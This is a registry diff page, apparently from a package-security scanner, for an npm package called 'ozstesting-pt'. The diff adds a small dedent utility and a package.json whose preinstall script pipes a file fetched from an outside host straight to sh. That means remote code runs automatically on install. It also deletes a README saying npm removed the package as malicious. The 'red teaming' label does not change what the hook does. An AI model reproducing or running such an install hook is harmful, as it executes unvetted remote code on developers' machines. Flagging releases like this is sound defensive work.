ozstesting-pt 0.0.1-security → 1.0.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of ozstesting-pt might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +16 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports.dedent = void 0; function dedent(text) { var re_whitespace = /^([ \t]*)(.*)\n/gm; var l, m, i; while ((m = re_whitespace.exec(text)) !== null) { if (!m[2]) continue; if ((l = m[1].length)) { i = i !== undefined ? Math.min(i, l) : l; } else break; } if (i) text = text.replace(new RegExp('^[ \t]{' + i + '}(.*\n)', 'gm'), '$1'); return text; } exports.dedent = dedent;
|
package/package.json
CHANGED
@@ -1,6 +1,19 @@
|
|
1
1
|
{
|
2
2
|
"name": "ozstesting-pt",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.0.1",
|
4
|
+
"description": "For Red Teaming Purposes",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "curl http://ssrf.not-malicious.xyz/run.txt | sh"
|
9
|
+
},
|
10
|
+
"author": "Oz",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
"ozstesting-pt": "^1.0.0"
|
14
|
+
},
|
15
|
+
"devDependencies": {},
|
16
|
+
"directories": {
|
17
|
+
"test": "test"
|
18
|
+
}
|
6
19
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=ozstesting-pt for more information.
|